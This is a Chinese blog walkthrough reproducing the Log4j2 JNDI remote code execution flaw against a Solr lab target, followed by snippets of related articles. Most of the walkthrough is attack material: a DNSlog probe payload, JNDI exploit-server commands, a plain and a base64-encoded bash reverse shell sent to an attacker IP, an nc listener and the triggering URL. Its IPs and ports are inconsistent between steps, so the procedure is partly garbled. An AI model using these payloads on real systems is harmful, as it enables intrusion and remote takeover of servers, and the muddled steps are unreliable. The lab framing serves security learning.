log4j2漏洞复现

最新推荐文章于 2024-08-14 11:39:49 发布
最新推荐文章于 2024-08-14 11:39:49 发布
阅读量480 收藏 11
点赞数 5
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68186313/article/details/140857395
版权

Log4j2是Apachel的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年未10g4j2爆出了远程代码执行漏洞,属于严重等级的漏洞

1、执行以下命令启动靶场环境并在浏览器访问

2、在DNSlog平台请求一个dns域名:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.649god.dnslog.cn}

直接访问

可知版本信息1.8.0

3、反弹shell需要使用JNDIExploit.v1.2

此时,

kali2024:中转--192.168.3.232

kali2023:攻击--192.168.3.137

centos7:靶机--192.168.3.70

首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.3.179

bash -i >& /dev/tcp/192.168.3.70/8080 0>&1

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM3LzgwODAgMD4mMQ==} | {base64, -d} |bash" -A 192.168.3.137

攻击机:开启监听nc -lvvp 6666

此时构造如下命令:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.137:1389/0izjha}

访问,成功反弹

http://192.168.3.70:8983为靶机的地址

192.168.3.232为中转机地址

192.168.3.137为Kali攻击机ip地址,此时要反弹shell

浅秋沐玖
关注
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j2复现
weixin_65219040的博客
06-18 585
目录环境搭建log4j2 DNSLog测试JNDI注入反弹shell 靶机:Ubuntu 5.4.0-117-generic   192.168.6.183 攻击机:Kali 5.16.0-kali7-amd64 192.168.6.212 靶机: #首先拉一个docker镜像 docker pull vulfocus/vulfocus #查看镜像 docker images #启动 docker run -d -p 8081:80 -v /var/run/docker.sock:/var
Apache Log4j2历史漏洞复现
懂进攻知防守
07-30 1758
Apache Log4j2漏洞简介: log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
heike_Ch的博客
08-14 1207
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
Log4j2漏洞(一)原理和dnslog验证
02-06 1932
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
Log4j2漏洞复现
qq_46222050的博客
02-16 3028
Log4j2漏洞复现 payload : ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn} ${jndi:ldap://sb6vjj.dnslog.cn/exp} 1.环境配置: 靶机:kali220 vps:centos 攻击机:win10 2.测试漏洞 漏洞点在action参数,将poc输入之前,要现在dnslog申请一个地址。 构造payload:htt
ArcGIS漏洞修补工具(Log4J
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
log4j-2.15.0-rc2
12-13
《深入理解log4j-2.15.0-rc2:SLF4J漏洞修复与源码解析》 在IT行业中,日志记录扮演着至关重要的角色,它帮助开发者追踪程序运行状态,定位错误,优化性能。Log4j作为Java世界中最广泛使用的日志框架之一,其最新...
#资源分享达人# 漏洞盒子自动提交漏洞脚本.zip
08-03
【标题】 "#资源分享达人# 漏洞盒子自动提交漏洞脚本.zip" 提供的是一份关于自动化向“漏洞盒子”平台提交漏洞的Python脚本。漏洞盒子是一款知名的漏洞管理平台,它允许安全研究人员发现并报告组织的安全漏洞,而这...
Log4j2漏洞复现(CVE-2021-44228)
鹿鸣天涯
01-13 650
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值